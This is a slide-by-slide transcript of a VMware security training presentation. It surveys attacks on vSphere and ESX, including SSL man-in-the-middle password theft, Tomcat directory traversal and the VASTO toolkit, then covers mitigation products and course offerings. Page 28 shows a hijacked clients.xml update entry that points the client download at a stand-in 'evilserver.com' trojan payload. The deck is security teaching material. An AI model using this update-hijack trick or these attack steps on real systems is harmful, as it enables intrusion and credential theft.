welcome!

40
WELCOME! Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+ Hacking Uncovered: VMware® Advanced VMware® Security The Latest Threats and Tools

Upload: kenna

Post on 24-Feb-2016

52 views

Category:

Documents


0 download

DESCRIPTION

WELCOME!. Hacking Uncovered: VMware ® Advanced VMware® Security The Latest Threats and Tools. Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+. Cool Offer!. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: WELCOME!

WELCOME!

Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+

Hacking Uncovered: VMware® Advanced VMware® SecurityThe Latest Threats and Tools

Page 2: WELCOME!

Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.

Cool Offer!

Page 3: WELCOME!

vSphere Just Another Layer to Attack?Recent Cases involving VMware

What are you in for? Hold On!

Pen Testing Methodology

GueststealerTomCat Zero Day Directory TraversalVASTOMitigation Techniques3rd Party Mitigation Tools

Page 4: WELCOME!

VMware – 80% of the Market Share

Do the Tools used in Pen Testing work with virtualization?

Are there hacks being designed just for VMware?

What is this costing us?

What is Happening today?

Page 5: WELCOME!

The Need is Here!

• CyberCrime and CyberWar Predictions for 2011

• #2 – Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists resulting in VM malware and Cloud downtime and Cloud data theft.

Hackin9 – Issue 01/2011(37)

Page 6: WELCOME!

What are the main security concerns associated with virtualization in general?Segregation of DutiesAccounting/LoggingNew API’s

VMsafevStoragevNetwork

VMsafe Virtual AppliancesPlug-InsShare Resources – can they be attacked?

Memory, CPU, Datastore

Time to Discuss

Page 7: WELCOME!

Virtualization – Just Another Layer to Attack

• vSphere Client• API’s • Plugin’s - VMware

• Update Manager• Guided Consolidation• VMware Converter• Storage vMotion

• Plugin’s - 3rd Party• Back Up Solutions (3rd Party -

Veeam)• RDP - (3rd Party - The RDP plug-

in, by Juxtaposition) • Invoke Plugin

Management

Interfaces

Page 8: WELCOME!

Web Service

ESX and vCenter both use a Web Service• vCenter on by

default – Why?• ESX disabled –

Thank God

Tomcat Web Service• How many

holes have we found here? WOW

Utilizes a Proxy• The is the

same proxy used by hostd.

Page 9: WELCOME!

VMware is using an old version of TomCat that leaves the username

and password in a world readable file!

Fixed by a recent update for vCenter 4.1

TomCat

Page 10: WELCOME!

VMCI

• It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted end-point.

• This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7.

VMCI, or Virtual Machine Communications Interface is an interface designed in the hardware of a VM.

http://pubs.vmware.com/vmci-sdk/VMCI_intro.html

Page 11: WELCOME!

ThreatsPerceivedKnown

RisksProbabilityPotential Impact

Time to Discuss

Page 12: WELCOME!

Secunia Historic AdvisoriesESX 4.xESXi 4.xvCenter Server 4.x

nvd.nist.govOver 40 Vulnerabilities for VMware Products

McAfee ThreatsVMware

ESX Server Heap Buffer OverflowvCenter Update Manager CSSvCenter Update Manager Directory Traversal

Some Vulnerabilities

Page 13: WELCOME!

Chained Exploit Example130 Million Credit Cards Stolen – Gonzalez Indictment• SQL Injection Attacks• SQL Injection Strings• Malware• Root kits• Visiting the stores• Disabling the logs• Using Proxies

Little Known Fact:Occurred on VMware!!!!

Page 14: WELCOME!

This does not change, regardless of the environment being tested.Information GatheringScanningEnumerationPenetration

FailStart Over or tell them great job

SucceedEscalate PrivilegesSteal Data or Leave proof of hackCover TracksLeave Backdoors

Methodology

Page 15: WELCOME!

GoogleNMAP – Since v4.8EttercapCain and AbelMetasploit

Claudio CriscioneVASTO – Virtualization ASsessment

TOolkit

Tools….

Page 16: WELCOME!

Shodan – You have to be kidding me!

Page 17: WELCOME!

Shodan – You have to be kidding me!

Page 18: WELCOME!

We have to find the systems first. Just like any other service, ESX has its own

tells. NMAP – will give you what you need. Lets see this in action!

Scanning for ESX

Page 19: WELCOME!

• Yes you can create your own modules.• We will take a look at VASTO – Virtualization ASsessment Toolkit by Claudio Criscione

Auxiliary Modules

• The purpose of meterpreter scripts are to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. (Metasploit)

• Meterpreter is an effective tool for creating backdoors.

Meterpreter

Page 20: WELCOME!

How we understand Fake Certificate Injection to work.

ARP Cache Poisoning will allow us to perform a successful SSL crack!

The hacking tools will create fake certificates. Two simultaneous SSL connections are established. One

between the victim and the hacker, the other between the hacker and the real server.

The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902.

SSL request

SSL reply(Fake certificate)

SSL request

SSL reply(Real Self Signed Cert)

F&JLMDHGST*KU P)JDGH$FDSD@Cleartext

Copy &

Alter

Stop

ESX Sever

Page 21: WELCOME!

VIC Client Login

Stealing the Password

Page 22: WELCOME!

DECISION TIME!

Page 23: WELCOME!

Password Revealed…

Page 24: WELCOME!

You are still vulnerable even if you use vCenter.

I can offer this:

Once the above password is stolen you can login to the host with the vpxuser and above password.

Screenshots

Page 25: WELCOME!

Presented at SchmooCon 2010

VULNERABLE VERSIONS

• Server• VMware Server 2.x < 2.0.2 build

203138 (Linux)• VMware Server 1.x < 1.0.10 build

203137 (Linux)• ESX/ESXi• ESX 3.5 w/o ESX350-200901401-SG• ESX 3.0.3 w/o ESX303-200812406-BG• ESXi 3.5 w/o ESXe350-200901401-I-SG

Page 26: WELCOME!

• Thanks for the Virtual Machines!GuestStealer

• How Large is your dictionary file?

Dictionary Attack

• Need to know exactly what is running?

Fingerprinting Tool

VASTO – Auxiliary Modules

Page 27: WELCOME!

vSphere Client Communication

Auto Update Process•<patchVersion>3.0.0</patchVersion>•<apiVersion>3.1.0</apiVersion>•<downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>

Client Server

1

23

4

GET /client/clients.xmlAutoUpdate URL

RetrieveServiceInstance

ServiceInstance

RetrieveServiceStatus

Status

GET /client/clients.xmlAutoupdate URL

Login

Page 28: WELCOME!

The Auto Update Process

• <patchVersion>3.0.0</patchVersion>• <apiVersion>3.1.0</apiVersion>• <downloadUrl>https://*/client/

VMware-viclient.exe</downloadUrl>

The Evil Guy

• <patchVersion>10.0.0</patchVersion>

• <apiVersion>3.1.0</apiVersion>• <downloadUrl>https://

evilserver.com/evilpaypoad.exe</downloadUrl>

VASTO VILurker

Page 29: WELCOME!

Change the clients.xml filename

The package will run under the user’s privilege!• Administrator

Anyone?

Provide your nasty trojan package.• Could be combined

with other attacks.

Create a fake web interface so

you look ligit!

This can be done as MiTM or

Rouge Server

You will trigger a “certificate error”

VASTO VILurker

Page 30: WELCOME!

VASTO Autopwn

Autopwn – How easy can it get?

Uses a flaw in the Tomcat Web Server

Transfers the Latest Session File from vCenter using a

Directory Traversal Attack.

Admin rights without knowing a

username or password!

Page 31: WELCOME!

Mitigating These Vulnerabilities

• Vmware• vShield Zones

• 3rd Party• Altor• Reflex• CheckPoint• Astaro Security Gateway• Tripwire• Catbird• HyTrust

Mitigation Tools – Best of the Breed

Page 32: WELCOME!
Page 33: WELCOME!
Page 34: WELCOME!

TrendMicro Deep SecurityTrend Micro Deep Security provides advanced

security for physical, virtual, and cloud servers and virtual desktops.

ModulesAgentless Malware Detection for VMsDeep Packet InspectionIntrusion Detection and PreventionWeb Application and ProtectionApplication ControlBidirectional Stateful FirewallIntegrity MonitoringLog Inspection

Page 35: WELCOME!

Deep Security Architecture

Page 36: WELCOME!

In-depth Look – *Authors PicksCatbird

Catbird TrustZones® policy-based security envelope for virtual infrastructures and the cloud. Enforces protection and measures compliance across virtual clusters and data centers.Catbird virtual security

appliance performs several functions: Hypervisor auditing Virtual network IPS Network segmentation and

access control Vulnerability management Multi-tenant security Reports to management

console

Page 37: WELCOME!

Catbird appliances collect data and enforce policies

Appliances report events to management console

Management console analyses events andcorrelates to compliance framework

Catbird – continuous compliance

Page 38: WELCOME!

1. Course Introduction and Methodology2. Penetration Testing 1013. Primer and Reaffirming our Knowledge4. Security Architecture, vCPU, vMemory5. Routing and the vNetwork6. vStorage – Architecture and Security Implementations7. Hardening the Virtual Machines8. Hardening the Host9. Hardening Virtual Center10. Virtualizing your DMZ11. 3rd Party Mitigation Tools12. Putting it all Together

VMware Advanced Security

Page 39: WELCOME!

1. Course Intro & Methodology 2. Virtualization Overview3. Planning & Installing ESX/ESXi 44. Using Tools to Administer a VMware Environment5. Configuring Networking6. Configuring Storage7. vCenter Server 4 and Licensing8. VM Creation and Configuration & Snapshots9. Security and Permissions10. Server and VM Monitoring11. Advanced ESX and vCenter Management12. Patching and Upgrading ESX/ESXi13. Disaster Recovery and Backup

50 Hours of Training – 6.5 Classes in ONE

vSphere 4.1 Ultimate Bootcamp

Page 40: WELCOME!

Does vSphere really have some major

issues?

Recent Cases involving ESX

Pen Testing Methodology

Web Related issues VASTO Mitigation

techniques

Questions?

Review